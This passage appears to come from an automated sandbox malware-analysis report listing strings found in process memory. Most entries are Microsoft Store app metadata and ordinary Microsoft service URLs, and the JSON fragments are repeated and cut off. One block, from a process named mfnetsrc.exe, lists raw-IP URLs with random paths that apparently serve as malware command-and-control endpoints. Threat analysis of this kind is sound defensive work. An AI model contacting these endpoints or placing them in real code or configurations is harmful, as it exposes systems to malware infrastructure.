G","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z\|\|.\|\|9eff4c9e-5599-4773-81dc-0299af880dd5\|\|1152921505693851877\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000001F.00000003.578669911.00000249A9D99000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-03T08:13:47.6485296Z\|\|.\|\|9eff4c9e-5599-4773-81dc-0299af880dd5\|\|1152921505693851877\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTit equals www.facebook.com (Facebook)
Source: svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTit equals www.twitter.com (Twitter)
Source: svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTit equals www.youtube.com (Youtube)
Source: svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac

Source: mfnetsrc.exe, 00000003.00000003.389444928.0000000003183000.00000004.00000001.sdmp	String found in binary or memory: http://102.182.145.130/Zffxf
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://102.182.145.130/ZffxffN/UUQGAqPKLO/
Source: mfnetsrc.exe, 00000003.00000002.643617963.0000000003160000.00000004.00000001.sdmp	String found in binary or memory: http://102.182.145.130/ZffxffN/UUQGAqPKLO/r
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/
Source: mfnetsrc.exe, 00000003.00000003.593894510.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/A
Source: mfnetsrc.exe, 00000003.00000002.643617963.0000000003160000.00000004.00000001.sdmp	String found in binary or memory: http://167.114.153.111:8080/Rbtuwk6tKXDP8l/q4Zme1rFlg/AdvdAlL/b4ILIf/Q8rZVqkkq/rDnmG2Ans/
Source: mfnetsrc.exe, 00000003.00000002.643617963.0000000003160000.00000004.00000001.sdmp	String found in binary or memory: http://172.104.97.173:8080/NrjO6cKOEtsgnTfdu/DdqP4I6wYv/OEK9fq/iwQk9ak8yU1H9c63AU/
Source: mfnetsrc.exe, 00000003.00000002.643617963.0000000003160000.00000004.00000001.sdmp	String found in binary or memory: http://172.104.97.173:8080/NrjO6cKOEtsgnTfdu/DdqP4I6wYv/OEK9fq/iwQk9ak8yU1H9c63AU/lication/octet-str
Source: mfnetsrc.exe, 00000003.00000002.643371598.0000000002BC6000.00000004.00000001.sdmp	String found in binary or memory: http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/
Source: mfnetsrc.exe, 00000003.00000002.643371598.0000000002BC6000.00000004.00000001.sdmp	String found in binary or memory: http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/t
Source: mfnetsrc.exe, 00000003.00000003.389444928.0000000003183000.00000004.00000001.sdmp	String found in binary or memory: http://173.173.254.105/dVjtW6oMoXz0rsF/f6FHy9ps6/FNv98e/sYjdUx6EAD0WvYm/u
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp, mfnetsrc.exe, 00000003.00000003.593894510.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://173.63.222.65/VQIMkjZKFdAVmy/
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://173.63.222.65/VQIMkjZKFdAVmy/be209e2c34a9550b8LMEM
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://218.147.193.146/GJXuLUUeqrq95alY1u/oD6pJ15oDS4/Z4M9h0lWKV4FEH0yB/k3vm9W8xS/TW0iKm9TEcJ7gRi0P/
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://51.89.199.141:8080/7zUrbHAgoGBYLL/SfmOyzopGPV6GjKjz/2Kjj2o/
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://51.89.199.141:8080/7zUrbHAgoGBYLL/SfmOyzopGPV6GjKjz/2Kjj2o/r7Gp
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://59.125.219.109:443/VRRce6rlsw9pK/DtY9XymlLmhK7GfUco/
Source: mfnetsrc.exe, 00000003.00000003.600690116.0000000003182000.00000004.00000001.sdmp	String found in binary or memory: http://64.207.182.168:8080/OQYP1ogFQccmQuTysw1/v0tPhparrkDhC/NKHirfkcd6IUp4b2kRd/qhg8GSGX1b4ILIf/Q8r
Source: svchost.exe, 00000008.00000002.535480278.0000026188A8B000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.599966953.00000249A9D00000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000008.00000002.535270378.0000026188A11000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.599866160.00000249A94EB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000C.00000002.305156857.00000222E6C13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 0000000A.00000002.640427785.000001EC0AE3E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.640427785.000001EC0AE3E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.640427785.000001EC0AE3E000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.640427785.000001EC0AE3E000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.640427785.000001EC0AE3E000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577751494.00000249A9D99000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000C.00000003.304857438.00000222E6C5A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000002.305240035.00000222E6C5C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000002.305240035.00000222E6C5C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.304841010.00000222E6C47000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000002.305240035.00000222E6C5C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.304878671.00000222E6C40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000003.304878671.00000222E6C40000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000002.305258030.00000222E6C5E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000003.304857438.00000222E6C5A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000002.305258030.00000222E6C5E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000002.305258030.00000222E6C5E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000002.305266612.00000222E6C62000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.304857438.00000222E6C5A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.304823674.00000222E6C61000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.305215297.00000222E6C3C000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.283049058.00000222E6C31000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000001F.00000003.577888353.00000249AA202000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.577764522.00000249A9DAA000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 0000001F.00000003.571166368.00000249A9D95000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.571262172.00000249A9DB7000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
